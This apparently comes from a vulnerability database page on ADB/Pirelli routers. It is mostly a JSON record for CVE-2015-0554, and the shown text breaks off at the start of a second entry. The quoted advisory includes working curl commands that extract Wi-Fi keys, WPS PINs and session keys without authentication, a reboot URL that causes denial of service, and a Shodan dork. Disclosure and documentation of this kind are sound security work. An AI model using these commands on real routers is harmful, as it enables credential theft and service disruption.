10 vulnerabilities by adb
VAR-201501-0227
Vulnerability from variot - Updated: 2024-02-13 22:34
The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. ADB (formerly known as Pirelli Broadband Solutions) P.DGA4001N is an ADSL wireless router product from ADB, Switzerland. ADB P.DGA4001N router has a security vulnerability. The program failed to properly restrict access to the web interface. Successful exploits may allow an attacker to bypass certain security restrictions and to perform unauthorized actions; this may aid in launching further attacks. ADB P.DGA4001N Router running firmware PDG_TEF_SP_4.06L.6 is vulnerable; other versions may also be affected.
- Title:
CVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N remote information disclosure HomeStation Movistar
- Author:
Eduardo Novella @enovella_ ednolo[@]inf.upv[dot]es
- Version:
Tested on firmware version PDG_TEF_SP_4.06L.6
- Shodan dork:
- "Dropbear 0.46 country:es" (it looks like this no longer works this way)
- Summary:
HomeStation Movistar has deployed routers manufactured by Pirelli. These routers allow HTML code to be fetched from any public IP in the world. There is neither authentication nor any protection to prevent unauthorized extraction of sensitive information.
- The vulnerability and the way to exploit it:
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_"
WLAN_DEAD

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey"
var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD';

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin"
var WscDevPin = '12820078';

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var sessionkey"
var sessionKey='1189641421';

$ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i "bssid:" -A 3
BSSID: DC:0B:1A:XX:XX:XX

Rebooting the router remotely and provoking a Denial of Service
-----------------------------------------------------------------
http://${IP_ADDRESS}/resetrouter.html
We can observe at the source:
http://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123
All the information what we can fetch from.
----------------------------------------------
webs$ ls
adslcfgadv.html diagpppoe.html ipv6lancfg.html qoscls.html statsatmreset.html
adslcfgc.html dlnacfg.html js qosqmgmt.html statsifc.html
adslcfg.html dnscfg.html jsps qosqueueadd.html statsifcreset.html
adslcfgtone.html dnsproxycfg.html lancfg2.html qsmain.html statsmocalanreset.html
algcfg.html dsladderr.html languages quicksetuperr.html statsmocareset.html
APIS dslbondingcfg.html lockerror.html quicksetup.html statsmocawanreset.html
atmdelerr.html enblbridge.html logconfig.html quicksetuptesterr.html statsvdsl.html
backupsettings.html enblservice.html logintro.html quicksetuptestsucc.html statsvdslreset.html
berrun.html engdebug.html logobkg.gif rebootinfo.html statswanreset.html
berstart.html ethadderr.html logoc.gif resetrouter.html statsxtmreset.html
berstop.html ethdelerr.html logo_corp.gif restoreinfo.html storageusraccadd.html
certadd.html footer.html logo.html routeadd.html stylemain.css
certcaimport.html hlpadslsync.html logomenu.gif rtdefaultcfgerr.html threeGPIN.html
certimport.html hlpatmetoe.html main.html rtdefaultcfg.html todadd.html
certloadsigned.html hlpatmseg.html menuBcm.js scdmz.html tr69cfg.html
cfgatm.html hlpethconn.html menu.html scinflt.html updatesettings.html
cfgeth.html hlppngdns.html menuTitle.js scmacflt.html upload.html
cfgl2tpac.html hlppnggw.html menuTree.js scmacpolicy.html uploadinfo.html
cfgmoca.html hlppppoasess.html mocacfg.html scoutflt.html upnpcfg.html
cfgptm.html hlppppoeauth.html multicast.html scprttrg.html url_add.html
colors.css hlppppoeconn.html natcfg2.html scripts util.js
config.json.txt hlppppoeip.html ntwksum2.html scvrtsrv.html wanadderr.html
css hlptstdns.html omcidownload.html seclogintro.html wancfg.html
ddnsadd.html hlpusbconn.html omcisystem.html snmpconfig.html wlcfgadv.html
defaultsettings.html hlpwlconn.html password.html sntpcfg.html wlcfg.html
dhcpinfo.html html portmapadd.html standby.html wlcfgkey.html
diag8021ag.html ifcdns.html portmapedit.html StaticIpAdd.html wlmacflt.html
diagbr.html ifcgateway.html portName.js StaticIpErr.html wlrefresh.html
diag.html images pppoe.html statsadslerr.html wlsecurity.html
diagipow.html index.html pradd.html statsadsl.html wlsetup.html
diaglan.html info.html ptmadderr.html statsadslreset.html wlwapias.html
diagmer.html ipoacfg.html ptmdelerr.html statsatmerr.html xdslcfg.html
diagpppoa.html ippcfg.html pwrmngt.html statsatm.html
- Conclusion:
This vulnerability can be exploited remotely and it should be patched as soon as possible. An attacker could be monitoring our network or, even worse, the device could be part of a botnet without our knowledge. A first mitigation could be either to update these routers to the latest firmware version or to install third-party firmware such as OpenWRT or DDWRT on them.
- References:
http://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html
- Timeline:
2013-04-xx Send email to Movistar and Pirelli
2015-01-05 Full disclosure
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201501-0227",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "p.dga4001n",
"scope": "eq",
"trust": 1.6,
"vendor": "adb",
"version": "pdg_tef_sp_4.06l.6"
},
{
"model": "p.dga4001n",
"scope": null,
"trust": 0.8,
"vendor": "adb sa",
"version": null
},
{
"model": "p.dga4001n",
"scope": "eq",
"trust": 0.8,
"vendor": "adb sa",
"version": "pdg_tef_sp_4.06l.6"
},
{
"model": "p.dga4001n router pdg tef sp 4.06l.6",
"scope": null,
"trust": 0.6,
"vendor": "adb",
"version": null
},
{
"model": "p.dga4001n pdg tef sp 4.06l.6",
"scope": null,
"trust": 0.3,
"vendor": "adb",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"db": "BID",
"id": "72705"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"db": "CNNVD",
"id": "CNNVD-201501-529"
},
{
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adb:p.dga4001n_firmware:pdg_tef_sp_4.06l.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adb:p.dga4001n:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported these issues.",
"sources": [
{
"db": "BID",
"id": "72705"
}
],
"trust": 0.3
},
"cve": "CVE-2015-0554",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.4,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 9.2,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.4,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2015-0554",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.4,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2015-00657",
"impactScore": 9.2,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.4,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-78500",
"impactScore": 9.2,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2015-0554",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2015-00657",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201501-529",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-78500",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2015-0554",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"db": "VULHUB",
"id": "VHN-78500"
},
{
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"db": "CNNVD",
"id": "CNNVD-201501-529"
},
{
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. ADB (formerly known as Pirelli Broadband Solutions) P.DGA4001N is an ADSL wireless router product from ADB, Switzerland. ADB P.DGA4001N router has a security vulnerability. The program failed to properly restrict access to the web interface. \nSuccessful exploits may allow an attacker to bypass certain security restrictions and to perform unauthorized actions; this may aid in launching further attacks. \nADB P.DGA4001N Router running firmware PDG_TEF_SP_4.06L.6 is vulnerable; other versions may also be affected. - Title:\n\nCVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N remote information disclosure \nHomeStation Movistar\n\n- Author:\n\nEduardo Novella @enovella_\nednolo[@]inf.upv[dot]es\n\n- Version:\n\nTested on firmware version PDG_TEF_SP_4.06L.6\n\n\n- Shodan dork : \n\t+ \"Dropbear 0.46 country:es\" ( From now on it looks like not working on this way)\n\n\n- Summary:\n\nHomeStation movistar has deployed routers manufactured by Pirelli. These routers are vulnerable to fetch HTML code from any \nIP public over the world. Neither authentication nor any protection to avoid unauthorized extraction of sensitive information. 
\n\n\n- The vulnerability and the way to exploit it:\n\n\n$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i \"WLAN_\"\n \u003coption value=\u00270\u0027\u003eWLAN_DEAD\u003c/option\u003e\n\n$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i \"var wpapskkey\"\nvar wpaPskKey = \u0027IsAklFHhFFui1sr9ZMqD\u0027;\n\n$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i \"var WscDevPin\"\nvar WscDevPin = \u002712820078\u0027;\n\n$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i \"var sessionkey\"\nvar sessionKey=\u00271189641421\u0027;\n\n$ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i \"bssid:\" -A 3\n \u003ctd width=\"50\"\u003eBSSID:\u003c/td\u003e\n \u003ctd\u003e\n DC:0B:1A:XX:XX:XX\n \u003c/td\u003e\n\n\n\n# Rebooting the router remotely and provoking a Denial of Service\n#-----------------------------------------------------------------\nhttp://${IP_ADDRESS}/resetrouter.html\n\nWe can observe at the source:\n\u003c!-- hide\n\nvar sessionKey=\u0027846930886\u0027;\nfunction btnReset() {\n var loc = \u0027rebootinfo.cgi?\u0027;\n\n loc += \u0027sessionKey=\u0027 + sessionKey;\n\n var code = \u0027location=\"\u0027 + loc + \u0027\"\u0027;\n eval(code);\n}\n\n// done hiding --\u003e\n\n\nhttp://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123\n\n\n# All the information what we can fetch from. 
\n#----------------------------------------------\nwebs$ ls\nadslcfgadv.html diagpppoe.html ipv6lancfg.html qoscls.html statsatmreset.html\nadslcfgc.html dlnacfg.html js qosqmgmt.html statsifc.html\nadslcfg.html dnscfg.html jsps qosqueueadd.html statsifcreset.html\nadslcfgtone.html dnsproxycfg.html lancfg2.html qsmain.html statsmocalanreset.html\nalgcfg.html dsladderr.html languages quicksetuperr.html statsmocareset.html\nAPIS dslbondingcfg.html lockerror.html quicksetup.html statsmocawanreset.html\natmdelerr.html enblbridge.html logconfig.html quicksetuptesterr.html statsvdsl.html\nbackupsettings.html enblservice.html logintro.html quicksetuptestsucc.html statsvdslreset.html\nberrun.html engdebug.html logobkg.gif rebootinfo.html statswanreset.html\nberstart.html ethadderr.html logoc.gif resetrouter.html statsxtmreset.html\nberstop.html ethdelerr.html logo_corp.gif restoreinfo.html storageusraccadd.html\ncertadd.html footer.html logo.html routeadd.html stylemain.css\ncertcaimport.html hlpadslsync.html logomenu.gif rtdefaultcfgerr.html threeGPIN.html\ncertimport.html hlpatmetoe.html main.html rtdefaultcfg.html todadd.html\ncertloadsigned.html hlpatmseg.html menuBcm.js scdmz.html tr69cfg.html\ncfgatm.html hlpethconn.html menu.html scinflt.html updatesettings.html\ncfgeth.html hlppngdns.html menuTitle.js scmacflt.html upload.html\ncfgl2tpac.html hlppnggw.html menuTree.js scmacpolicy.html uploadinfo.html\ncfgmoca.html hlppppoasess.html mocacfg.html scoutflt.html upnpcfg.html\ncfgptm.html hlppppoeauth.html multicast.html scprttrg.html url_add.html\ncolors.css hlppppoeconn.html natcfg2.html scripts util.js\nconfig.json.txt hlppppoeip.html ntwksum2.html scvrtsrv.html wanadderr.html\ncss hlptstdns.html omcidownload.html seclogintro.html wancfg.html\nddnsadd.html hlpusbconn.html omcisystem.html snmpconfig.html wlcfgadv.html\ndefaultsettings.html hlpwlconn.html password.html sntpcfg.html wlcfg.html\ndhcpinfo.html html portmapadd.html standby.html 
wlcfgkey.html\ndiag8021ag.html ifcdns.html portmapedit.html StaticIpAdd.html wlmacflt.html\ndiagbr.html ifcgateway.html portName.js StaticIpErr.html wlrefresh.html\ndiag.html images pppoe.html statsadslerr.html wlsecurity.html\ndiagipow.html index.html pradd.html statsadsl.html wlsetup.html\ndiaglan.html info.html ptmadderr.html statsadslreset.html wlwapias.html\ndiagmer.html ipoacfg.html ptmdelerr.html statsatmerr.html xdslcfg.html\ndiagpppoa.html ippcfg.html pwrmngt.html statsatm.html\n\n\n\n+ Conclusion:\n\n\tThis vulnerability can be exploited remotely and it should be patched as soon as possible. An attacker could be monitoring our network\n or even worse being a member of a botnet without knowledge of it. \n\tFirst mitigation could be either try to update the last version for these routers or install 3rd parties firmwares as OpenWRT or DDWRT on them. \n \n\n\n+ References:\n\nhttp://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html\n\n\n\n+ Timeline:\n\n2013-04-xx Send email to Movistar and Pirelli\n2015-01-05 Full disclosure \n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-0554"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"db": "BID",
"id": "72705"
},
{
"db": "VULHUB",
"id": "VHN-78500"
},
{
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"db": "PACKETSTORM",
"id": "129828"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-78500",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=35721",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-78500"
},
{
"db": "VULMON",
"id": "CVE-2015-0554"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-0554",
"trust": 3.6
},
{
"db": "PACKETSTORM",
"id": "129828",
"trust": 3.3
},
{
"db": "EXPLOIT-DB",
"id": "35721",
"trust": 2.4
},
{
"db": "BID",
"id": "72705",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201501-529",
"trust": 0.7
},
{
"db": "EXPLOITDB",
"id": "35721",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2015-00657",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-78500",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2015-0554",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"db": "VULHUB",
"id": "VHN-78500"
},
{
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"db": "BID",
"id": "72705"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"db": "PACKETSTORM",
"id": "129828"
},
{
"db": "CNNVD",
"id": "CNNVD-201501-529"
},
{
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"id": "VAR-201501-0227",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"db": "VULHUB",
"id": "VHN-78500"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-00657"
}
]
},
"last_update_date": "2024-02-13T22:34:44.864000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://broadband.adbglobal.com/"
},
{
"title": "Kenzer Templates [5170] [DEPRECATED]",
"trust": 0.1,
"url": "https://github.com/arpsyndicate/kenzer-templates "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-78500"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.3,
"url": "http://packetstormsecurity.com/files/129828/pirelli-adsl2-2-wireless-router-p.dga4001n-information-disclosure.html"
},
{
"trust": 2.4,
"url": "http://www.exploit-db.com/exploits/35721"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0554"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-0554"
},
{
"trust": 0.3,
"url": "http://broadband.adbglobal.com/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/264.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/35721/"
},
{
"trust": 0.1,
"url": "https://github.com/arpsyndicate/kenzer-templates"
},
{
"trust": 0.1,
"url": "http://${ip_address}/resetrouter.html"
},
{
"trust": 0.1,
"url": "http://${ip_address}/rebootinfo.cgi?sessionkey=233665123"
},
{
"trust": 0.1,
"url": "http://${ip_address}/wlsecurity.html"
},
{
"trust": 0.1,
"url": "http://packetstormsecurity.com/files/115663/alpha-networks-adsl2-2-wireless-router-asl-26555-password-disclosure.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-0554"
},
{
"trust": 0.1,
"url": "http://${ip_address}/wlcfg.html"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"db": "VULHUB",
"id": "VHN-78500"
},
{
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"db": "BID",
"id": "72705"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"db": "PACKETSTORM",
"id": "129828"
},
{
"db": "CNNVD",
"id": "CNNVD-201501-529"
},
{
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"db": "VULHUB",
"id": "VHN-78500"
},
{
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"db": "BID",
"id": "72705"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"db": "PACKETSTORM",
"id": "129828"
},
{
"db": "CNNVD",
"id": "CNNVD-201501-529"
},
{
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-01-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"date": "2015-01-21T00:00:00",
"db": "VULHUB",
"id": "VHN-78500"
},
{
"date": "2015-01-21T00:00:00",
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"date": "2015-02-21T00:00:00",
"db": "BID",
"id": "72705"
},
{
"date": "2015-01-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"date": "2015-01-06T23:51:58",
"db": "PACKETSTORM",
"id": "129828"
},
{
"date": "2015-01-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201501-529"
},
{
"date": "2015-01-21T18:59:50.917000",
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-01-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-00657"
},
{
"date": "2015-01-23T00:00:00",
"db": "VULHUB",
"id": "VHN-78500"
},
{
"date": "2015-01-23T00:00:00",
"db": "VULMON",
"id": "CVE-2015-0554"
},
{
"date": "2015-02-21T00:00:00",
"db": "BID",
"id": "72705"
},
{
"date": "2015-01-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-001212"
},
{
"date": "2015-01-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201501-529"
},
{
"date": "2015-01-23T20:43:03.387000",
"db": "NVD",
"id": "CVE-2015-0554"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "129828"
},
{
"db": "CNNVD",
"id": "CNNVD-201501-529"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ADB P.DGA4001N Vulnerability in obtaining important information in router firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-001212"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201501-529"
}
],
"trust": 0.6
}
}
VAR-201807-1046
Vulnerability from variot - Updated: 2023-12-18 13:56
All ADB broadband gateways / routers based on the Epicentro platform are affected by an authorization bypass vulnerability where attackers are able to access and manipulate settings within the web interface that are forbidden to end users (e.g., by the ISP). An attacker would be able to enable the TELNET server or other settings as well. Multiple ADB Broadband gateways and routers contain vulnerabilities related to authorization, authority, and access control. Information may be tampered with. ADB broadband gateways/routers on Epicentro platform is a gateway and router device for the Epicentro platform from ADB, Switzerland. A security vulnerability exists in ADB broadband gateways/routers based on the Epicentro platform
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
